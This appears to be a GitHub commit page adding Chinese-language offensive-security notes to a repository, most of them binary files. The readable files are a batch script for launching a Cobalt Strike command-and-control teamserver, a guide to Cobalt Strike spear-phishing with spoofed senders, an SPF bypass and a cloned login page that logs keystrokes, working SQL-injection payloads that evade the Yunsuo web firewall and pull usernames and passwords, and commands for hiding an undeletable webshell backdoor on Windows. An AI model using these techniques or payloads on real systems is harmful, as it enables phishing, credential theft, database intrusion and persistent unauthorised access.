-
Notifications
You must be signed in to change notification settings - Fork 7
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
88 changed files
with
245 additions
and
0 deletions.
There are no files selected for viewing
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,55 @@ | ||
| CS的teamserver经常是在linux服务器上跑的,有小伙伴问在win server上怎么跑,所以弄了一个批处理,需要的看着改改,win上面需要装[`java JDK`](http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html),win上默认没有keytool,所以需要自己去生成一个cobaltstrike.store ~ | ||
|
|
||
| ``` | ||
| @echo off | ||
| :check_java | ||
| java -version >nul 2>&1 | ||
| if %errorLevel% == 0 ( | ||
| goto:check_permissions | ||
| ) else ( | ||
| echo [-] is Java installed? | ||
| goto:eof | ||
| ) | ||
| :check_permissions | ||
| echo [+] Administrative permissions required. Detecting permissions... | ||
| set TempFile_Name=%SystemRoot%\System32\BatTestUACin_SysRt%Random%.batemp | ||
| (echo "BAT Test UAC in Temp" >%TempFile_Name% ) 1>nul 2>nul | ||
| if exist %TempFile_Name% ( | ||
| echo [+] Success: Administrative permissions confirmed. | ||
| del %TempFile_Name% 1>nul 2>nul | ||
| goto:check_certificate | ||
| ) else ( | ||
| echo [-] Failure: Current permissions inadequate. | ||
| goto:eof | ||
| ) | ||
| :check_certificate | ||
| set certificate=".\cobaltstrike.store" | ||
| if exist %certificate% ( | ||
| goto:test_arguments | ||
| ) else ( | ||
| echo [!] Please generate the cobaltstrike.store ! | ||
| echo [!] Example: keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth" | ||
| goto:eof | ||
| ) | ||
| :test_arguments | ||
| set argC=0 | ||
| for %%x in (%*) do Set /A argC+=1 | ||
| if %argC% LSS 2 ( | ||
| echo [-] teamserver ^<host^> ^<password^> [/path/to/c2.profile] [YYYY-MM-DD] | ||
| echo ^<host^> is the default IP address of this Cobalt Strike team server | ||
| echo ^<password^> is the shared password to connect to this server | ||
| echo [/path/to/c2.profile] is your Malleable C2 profile | ||
| echo [YYYY-MM-DD] is a kill date for Beacon payloads run from this server | ||
| goto:eof | ||
| ) else ( | ||
| goto:run_cobal | ||
| ) | ||
| :run_cobal | ||
| java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer %* | ||
| ``` | ||
|
|
||
|  | ||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
105 changes: 105 additions & 0 deletions
105
books/Cobalt_Strike_Spear_Phish_Evi1cg's blog CS邮件钓鱼制作.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,105 @@ | ||
| Cobalt Strike Spear Phish | Evi1cg's blog | ||
|
|
||
|  | ||
|
|
||
| ## 0x00 简介 | ||
|
|
||
| 关于 Spear phish 和发件人伪造的工具有很多个,比如 [gophish](https://getgophish.com/)、 [SimpleEmailSpoofer](https://github.com/lunarca/SimpleEmailSpoofer)、命令行工具 swaks 等,每个工具都有其特点,当然 Cobalt Strike 也有此功能。官方介绍[戳我](https://cobaltstrike.com/help-spear-phish)。今天主要来介绍一下 CS 里面的此功能怎么使用。 | ||
|
|
||
| ## 0x01 CS Spear Phish | ||
|
|
||
| CS 的 Spear Phish 位置在: | ||
|
|
||
|  | ||
|
|
||
| 一张图说明功能: | ||
|
|
||
|  | ||
|
|
||
| 使用此功能的前提是需要有一个 smtp 服务器来供我们来转发邮件,当然可以使用公共 smtp 服务,另外也可以参考[《Something about email spoofing》](https://evi1cg.github.io/archives/Email_spoofing.html) 中提到的方法来搭建。 | ||
| 这里的使用很简单,首先构造目标列表,使用: | ||
|
|
||
| 中间的分隔符为 [tab], 可以不添加 name | ||
|
|
||
| 添加好以后就是这个样子: | ||
|
|
||
|  | ||
|
|
||
| 下面,要配置发件模板,这里配置很简单,只需要复制一份原始邮件即可,比如一份密码重置邮件: | ||
|
|
||
|  | ||
|
|
||
| 选择显示原始邮件,并将其内容保存。 | ||
|
|
||
| 在这里如果要伪造发件人,需要修改`From:` | ||
|
|
||
|  | ||
|
|
||
| 否则就不需要做什么别的修改。之后,配置对应的`Mail server`,就可以进行发送邮件了,这里需要注意一点, 为了绕过 SPF 的检查,`Bunce to`需设置为与`Mail server`同域,如`Mail server`为 `mail.evi1cg.me`,`Bunce to`可设置为 [`[email protected]](mailto:`[email protected])`。 | ||
|
|
||
|
|
||
| 之后点击`Send`则可发送邮件,收到的邮件与模板一致。 | ||
|
|
||
|  | ||
|
|
||
| 另外查看 SRF 为`PASS`状态: | ||
|
|
||
|
|
||
|
|
||
|  | ||
|
|
||
| 另外,CS 也有发送附件的功能,但是原版本的 CS 发送附件有一个 Bug,即如果附件为中文名称,则会在最后的邮件中显示乱码附件: | ||
|
|
||
|  | ||
|
|
||
| 所以在这里我们需要对 CS 动刀了,经过调试,成功定位到`mail\Eater.java`,需要对此类中的`createAttachment`方法进行修改: | ||
|
|
||
| ``` | ||
| private BodyPart createAttachment(String name) throws IOException { | ||
| File file = new File(name); | ||
| String namez = file.getName(); | ||
| String filename = new String(namez.getBytes("utf-8"),"ISO8859-1"); | ||
| Body body = (new StorageBodyFactory()).binaryBody((InputStream)(new FileInputStream(name))); | ||
| Map temp = new HashMap(); | ||
| temp.put("name", filename); | ||
| BodyPart bodyPart = new BodyPart(); | ||
| bodyPart.setBody(body, "application/octet-stream", temp); | ||
| bodyPart.setContentTransferEncoding("base64"); | ||
| bodyPart.setContentDisposition("attachment"); | ||
| bodyPart.setFilename(filename); | ||
| return bodyPart; | ||
| } | ||
| ``` | ||
|
|
||
| 这样就可以解决附件乱码问题了: | ||
|
|
||
|  | ||
|
|
||
| ## 0x02 Web clone | ||
|
|
||
| 另外在这里还有一个与 Web Clone 结合的地方,首先,我们先 Clone 一个需登录的网站,如网易邮箱: | ||
|
|
||
|  | ||
|
|
||
| 这里可以选择开启键盘记录功能。 | ||
|
|
||
| 开启 Clone: | ||
|
|
||
|  | ||
|
|
||
| 设置 spear phish: | ||
|
|
||
|  | ||
|
|
||
| Embed URL 选择刚刚克隆的 url,发送邮件,此时用户点击重置按钮,则会跳转到 Clone 的站点: | ||
|
|
||
|  | ||
|
|
||
| 此时,用户输入会被记录: | ||
|
|
||
|  | ||
|
|
||
| emmm. 大概就介绍这么多吧。 | ||
|
|
||
| 原文地址:<https://evi1cg.me/archives/spear_phish.html> | ||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## bypass云锁注入测试 | ||
|
|
||
| **实验环境** | ||
| 刚去云锁官网下的 | ||
|
|
||
| Apache/2.4.23 | ||
|
|
||
| PHP/5.4 | ||
|
|
||
| mysql 5 | ||
|
|
||
| **Paylaod** | ||
|
|
||
| `order by `拦截 | ||
|
|
||
|  | ||
|
|
||
| `order/*!10000by*/5 ` | ||
|
|
||
|  | ||
|
|
||
| union 不拦截 | ||
| select 不拦截 | ||
| union select 拦截 | ||
| union 各种字符 select 拦截 | ||
| `union/*select*/ `不拦截 | ||
|
|
||
| `union%20/*!10000all%20select*/%201,2,database/**/(),4,5` | ||
|
|
||
|  | ||
|
|
||
| `union/*!10000all*//*!10000select+1,password,username*/,4,5%20from%20user` | ||
|
|
||
|  | ||
|
|
||
| 来源:https://www.t00ls.net/articles-55793.html | ||
|
|
||
| 欢迎大家投稿注册土司. |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added
BIN
+24 MB
books/mac上Parallels Desktop安装kali linux 2020.2a并安装好Parallels Tools+Google拼音输入法.docx
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,47 @@ | ||
| ## windows下隐藏webshell的方法 | ||
|
|
||
| 1、利用保留字隐藏 | ||
| windows系统有些保留文件夹名,windows系统不允许用这些名字命名文件夹,比如: | ||
|
|
||
| `aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt`等。 | ||
|
|
||
| 我们可以这么做: | ||
| ``` | ||
| echo code>>d:\test.asp | ||
| copy d:\test.asp \\.\d:\aux.asp | ||
| ``` | ||
|
|
||
| 这样就可以创建一个无法删除的文件了,这个文件在图形界面下是无法删除的,甚至del d:\aux.asp也无法删除 | ||
|
|
||
| 2、利用clsid隐藏 | ||
|
|
||
| windows中每一个程序都有一个clsid,创建一个文件夹,取名x.{21ec2020-3aea-1069-A2dd-08002b30309d}这时候打开这个文件夹就是控制面板了,为了更隐蔽些我们可以结合windows保留字使用以下命令: | ||
|
|
||
| `md \\.\d:\com1.{21ec2020-3aea-1069-A2dd-08002b30309d}` | ||
|
|
||
| 这样生成的文件夹无法删除,无法修改,无法查看 | ||
|
|
||
| 3、利用注册表隐藏 | ||
| 注册表路径: | ||
|
|
||
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL` | ||
|
|
||
| 在这个路径下有一个`CheckedValue`的键值,把他修改为`0`,如果没有`CheckValue`这个key直接创建一个,将他赋值为`0`,然后创建的隐藏文件就彻底隐藏了,即时在文件夹选项下把“显示所有文件”也不能显示了。 | ||
|
|
||
| 我们再结合保留字和clsid两种方法生成一个后门。 | ||
|
|
||
| 首先我们创建一个目录`md\\.\d:\com1.{21ec2020-3aea-1069-A2dd-08002b30309d}` | ||
|
|
||
| 接着`attrib -s -h -a -r x:\RECYCLED&© x:\RECYCLED \\.\d:\com1.{21ec2020-3aea-1069-A2dd-08002b30309d}\` | ||
|
|
||
| 为了保险起见,我们在这个回收站丢点东西证明它是在运作的`echo exec code>>\\.\d:\com1.{21ec2020-3aea-1069-A2dd-08002b30309d}\RECYCLED\aux.asp` | ||
|
|
||
| 好了一个超级猥琐的后门诞生了,但,并不完美,或许还可以这么做 | ||
|
|
||
| ``` | ||
| attrib \\.\d:\com1.{21ec2020-3aea-1069-A2dd-08002b30309d}\RECYCLED\aux.asp +h +s +r +d /s /d | ||
| cacls /E /G Everyone:N | ||
| ``` | ||
|
|
||
| 一个基于system桌面权限以及任何webshell,以及Cmd下的都无法查看,修改,和Del的完美后门诞生了。 |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.